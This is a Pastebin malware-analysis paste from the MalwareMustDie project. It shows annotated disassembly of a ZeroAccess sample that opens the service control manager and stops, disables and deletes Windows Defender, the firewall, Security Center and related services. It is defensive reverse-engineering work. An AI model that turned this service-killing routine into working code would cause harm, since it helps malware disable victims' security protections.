Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
- // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
- // In the .text PE section found the operation
- // to close all processes of :
- // MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
- // @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013
- // usage of DisableThreadLibraryCalls :
- // A function lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls.
- 0x4017FB push [ebp+hLibModule] ; hLibModule
- 0x4017FE call ds:DisableThreadLibraryCalls
- 0x401804 call sub_4016D1
- 0x401809 test eax, eax
- 0x40180B jz short loc_401832
- // Opening keyroot
- 0x402659 call ds:ZwOpenKey
- 0x40265F test eax, eax
- 0x402661 jl short loc_40267A
- 0x402663 push offset asc_41D0DC ; " \""
- 0x402668 push [ebp+hSCObject]
- 0x40266B call ds:ZwDeleteValueKey
- 0x402671 push [ebp+hSCObject]
- 0x402674 call ds:ZwClose
- // Using the OpenSCManagerW
- 0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj
- 0x40267A push 0F003Fh ; dwDesiredAccess
- 0x40267F push 0 ; lpDatabaseName
- 0x402681 push 0 ; lpMachineName
- 0x402683 call ds:OpenSCManagerW ; Establish a connection to the service
- ; control manager on the specified computer
- ; and opens the specified database
- 0x402689 mov [ebp+hSCObject], eax
- 0x40268C test eax, eax
- 0x40268E jz loc_40274B
- 0x402694 push ebx
- 0x402695 push esi
- 0x402696 push edi
- // opening service "MsMpSvc"
- 0x402697 mov edi, ds:OpenServiceW
- 0x40269D mov ebx, 0F01FFh
- 0x4026A2 push ebx ; dwDesiredAccess
- 0x4026A3 push offset ServiceName ; "MsMpSvc"
- 0x4026A8 push eax ; hSCManager
- 0x4026A9 call edi ; OpenServiceW
- 0x4026AB test eax, eax
- 0x4026AD jz short loc_4026B6
- 0x4026AF mov esi, eax
- 0x4026B1 call sub_4024E2
- // opening service "windefen"
- 0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j
- 0x4026B6 push ebx ; dwDesiredAccess
- 0x4026B7 push offset aWindefend ; "windefend"
- 0x4026BC push [ebp+hSCObject] ; hSCManager
- 0x4026BF call edi ; OpenServiceW
- 0x4026C1 test eax, eax
- 0x4026C3 jz short loc_4026CC
- 0x4026C5 mov esi, eax
- 0x4026C7 call sub_4024E2
- // opening service "SharedAccess"
- 0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj
- 0x4026CC push ebx ; dwDesiredAccess
- 0x4026CD push offset aSharedaccess ; "SharedAccess"
- 0x4026D2 push [ebp+hSCObject] ; hSCManager
- 0x4026D5 call edi ; OpenServiceW
- 0x4026D7 test eax, eax
- 0x4026D9 jz short loc_4026E2
- 0x4026DB mov esi, eax
- 0x4026DD call sub_4024E2
- 0x4026E2
- // opening service "iphlpsvc"
- 0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j
- 0x4026E2 push ebx ; dwDesiredAccess
- 0x4026E3 push offset aIphlpsvc ; "iphlpsvc"
- 0x4026E8 push [ebp+hSCObject] ; hSCManager
- 0x4026EB call edi ; OpenServiceW
- 0x4026ED test eax, eax
- 0x4026EF jz short loc_4026F8
- 0x4026F1 mov esi, eax
- 0x4026F3 call sub_4024E2
- 0x4026F8
- // opening service "wscsvc"
- 0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj
- 0x4026F8 push ebx ; dwDesiredAccess
- 0x4026F9 push offset aWscsvc ; "wscsvc"
- 0x4026FE push [ebp+hSCObject] ; hSCManager
- 0x402701 call edi ; OpenServiceW
- 0x402703 test eax, eax
- 0x402705 jz short loc_40270E
- 0x402707 mov esi, eax
- 0x402709 call sub_4024E2
- 0x40270E
- // opening service "mpssvc"
- 0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j
- 0x40270E push ebx ; dwDesiredAccess
- 0x40270F push offset aMpssvc ; "mpssvc"
- 0x402714 push [ebp+hSCObject] ; hSCManager
- 0x402717 call edi ; OpenServiceW
- 0x402719 test eax, eax
- 0x40271B jz short loc_402724
- 0x40271D mov esi, eax
- 0x40271F call sub_4024E2
- 0x402724
- // opening service "bfe"
- 0x402724 loc_402724: ; CODE XREF: sub_402634+E7j
- 0x402724 push ebx ; dwDesiredAccess
- 0x402725 push offset aBfe ; "bfe"
- 0x40272A push [ebp+hSCObject] ; hSCManager
- 0x40272D call edi ; OpenServiceW
- 0x40272F test eax, eax
- 0x402731 jz short loc_40273A
- 0x402733 mov esi, eax
- 0x402735 call sub_4024E2
- 0x40273A
- // Close them handles..
- 0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj
- 0x40273A push [ebp+hSCObject] ; hSCObject
- 0x40273D call ds:CloseServiceHandle
- 0x402743 call sub_402593
- 0x402748 pop edi
- 0x402749 pop esi
- 0x40274A pop ebx
- // Checking those services...
- 0x4024E2 sub_4024E2 proc near ;
- 0x4024E2
- 0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch
- 0x4024E2
- 0x4024E2 sub esp, 1Ch
- 0x4024E5 push edi
- 0x4024E6 push 4
- 0x4024E8 pop edi
- 0x4024E9
- // preparations...
- 0x4024E9 loc_4024E9: ;
- 0x4024E9 lea eax, [esp+20h+ServiceStatus]
- 0x4024ED push eax ; lpServiceStatus
- 0x4024EE push 1 ; dwControl
- 0x4024F0 push esi ; hService
- 0x4024F1 call ds:ControlService ; <==========To control code to a Win32 service
- 0x4024F7 test eax, eax
- 0x4024F9 jnz short loc_402516
- 0x4024FB call ds:GetLastError
- 0x402501 cmp eax, 41Bh
- 0x402506 jnz short loc_402516
- 0x402508 push 3E8h ; dwMilliseconds
- 0x40250D call ds:Sleep
- 0x402513 dec edi
- 0x402514 jnz short loc_4024E9
- 0x402516
- 0x402516 loc_402516:
- 0x402516 xor eax, eax
- 0x402518 push eax ; lpDisplayName
- 0x402519 push eax ; lpPassword
- 0x40251A push eax ; lpServiceStartName
- 0x40251B push eax ; lpDependencies
- 0x40251C push eax ; lpdwTagId
- 0x40251D push eax ; lpLoadOrderGroup
- 0x40251E push eax ; lpBinaryPathName
- 0x40251F push eax ; dwErrorControl
- 0x402520 push 4 ; dwStartType
- 0x402522 push 20h ; dwServiceType
- 0x402524 push esi ; hService
- // stop it all....
- 0x402525 call ds:ChangeServiceConfigW <=== triger to change status service..
- 0x40252B push esi ; <========value of hService
- 0x40252C call ds:DeleteService
- 0x402532 push esi ; <=== value of hSCObject
- 0x402533 call ds:CloseServiceHandle
- 0x402539 pop edi
- 0x40253A add esp, 1Ch
- 0x40253D retn
- 0x40253D sub_4024E2 endp
- ---
- #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement